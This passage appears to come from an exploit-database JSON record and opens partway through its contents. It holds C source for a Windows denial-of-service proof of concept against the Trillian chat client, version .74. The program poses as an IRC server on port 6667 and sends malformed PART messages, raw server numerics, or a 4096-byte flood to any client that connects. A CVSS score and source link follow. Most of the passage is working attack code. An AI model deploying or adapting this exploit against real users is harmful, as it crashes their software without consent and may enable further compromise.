usage();\r\n\t\t \t\t return 1;\r\n\t\t }\r\n\r\n\t\t printf(\"Listening on port 6667 for connections....\\n\");\r\n\t\t if (WSAStartup(MAKEWORD(1, 1), &WsaDat) != 0) {\r\n \t\t printf(\"ERROR: WSA Initialization failed.\");\r\n\t\t \t\t return 0;\r\n\t\t }\r\n\r\n\r\n\t\t /* Create Socket */\r\n\t\t s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n\t\t if (s == INVALID_SOCKET) {\r\n\t\t \t\t printf(\"ERROR: Could Not Create Socket. 
Exiting\\n\");\r\n\t\t \t\t WSACleanup();\r\n\t\t \t\t return 0;\r\n\t\t }\r\n\r\n\t\t Sockaddr.sin_port = htons(6667);\r\n\t\t Sockaddr.sin_family = AF_INET;\r\n\t\t Sockaddr.sin_addr.s_addr = INADDR_ANY;\r\n\r\n\r\n nRet = bind(s, (LPSOCKADDR)&Sockaddr, sizeof(struct sockaddr));\r\n\t\t if (nRet == SOCKET_ERROR) {\r\n\t\t \t\t printf(\"ERROR Binding Socket\");\r\n\t\t \t\t WSACleanup();\r\n\t\t \t\t return 0;\r\n\t\t }\r\n\r\n\t\t /* Make Socket Listen */\r\n\t\t if (listen(s, 10) == SOCKET_ERROR) {\r\n\t\t \t\t printf(\"ERROR: Couldnt Make Listening Socket\\n\");\r\n\t\t \t\t WSACleanup();\r\n\t\t \t\t return 0;\r\n\t\t }\r\n\r\n\t\t while (TempSock == SOCKET_ERROR) {\r\n\t\t TempSock = accept(s, NULL, NULL);\r\n\t\t }\r\n\r\n\t\t printf(\"Client Connected, Sending Payload\\n\");\r\n\r\n\r\n\t\t if (!strcmp(argv[1],\"part\")) {\r\n\t\t \t\t send(TempSock,PART,strlen(PART),0);\r\n\t\t }\r\n\t\t if (!strcmp(argv[1],\"raw\")) {\r\n\t\t \t\t send(TempSock,SERVER,strlen(SERVER),0);\r\n\t\t \t\t send(TempSock,argv[2],strlen(argv[2]),0);\r\n\t\t \t\t send(TempSock,\"\\n\",1,0);\r\n\t\t }\r\n\t\t if (!strcmp(argv[1],\"data\")) {\r\n\t\t \t\t memset(payload,'A',4096);\r\n\t\t \t\t send(TempSock,payload,strlen(payload),0);\r\n\t\t }\r\n\t\t printf(\"Exiting\\n\");\r\n\t\t sleep(100);\r\n\t\t WSACleanup();\r\n\t\t return 0;\r\n}\r\n\r\nusage() {\r\n\t\t \t\t printf(\"\\nTrillian Multiple DoS Flaws\\n\");\r\n\t\t \t\t printf(\"---------------------------\\n\");\r\n\t\t \t\t printf(\"Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\\n\");\r\n\t\t \t\t printf(\"Tested On Version .74\\n\\n\");\r\n\t\t \t\t printf(\"Usage: Trillian-Dos <type> [num]\\n\");\r\n\t\t \t\t printf(\"Type: raw, part, data\\n\");\r\n\t\t \t\t printf(\"Num : 206, 211, 213, 214, 215, 217, 218, 243, 302, 317, 324, 332,\r\n333, 352, 367\\n\\n\");\r\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": 
"https://www.exploit-db.com/download/21823/"}]}